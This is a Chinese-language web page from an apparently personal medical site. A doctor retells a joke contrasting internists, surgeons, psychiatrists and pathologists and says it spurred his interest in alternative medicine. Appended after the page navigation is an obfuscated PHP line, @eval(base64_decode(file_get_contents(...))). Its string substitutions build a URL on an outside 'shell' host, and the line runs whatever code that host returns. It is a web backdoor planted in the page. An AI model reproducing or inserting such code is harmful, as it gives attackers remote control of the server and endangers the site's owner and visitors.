收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 朝不同領域的另類醫學努力研究的動力
朝不同領域的另類醫學努力研究的動力 列印 E-mail

        看病的生意特別好,有人說那是一種開業術。在西醫同業中,醫師們在比賽收入與患者數目多寡之餘,流傳著一個相互調侃的笑話──內科醫師是「知而無為的人」(He knows everything;does nothing),外科醫師是「無知而為的人」(He knows nothing;does everything )

精神科醫師是「無知也無為的人」(He knows nothing;does nothing ),病理科醫師是「知而有為的人,但他的作為總是遲了一步」(He knows everything;does everything ;but is always too late)。

雖然那是笑話,但其中或多或少存在一些真實性,是身為醫師的我時刻深切反省的!這也是我之後一直朝不同領域的另類醫學努力研究的動力。

 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));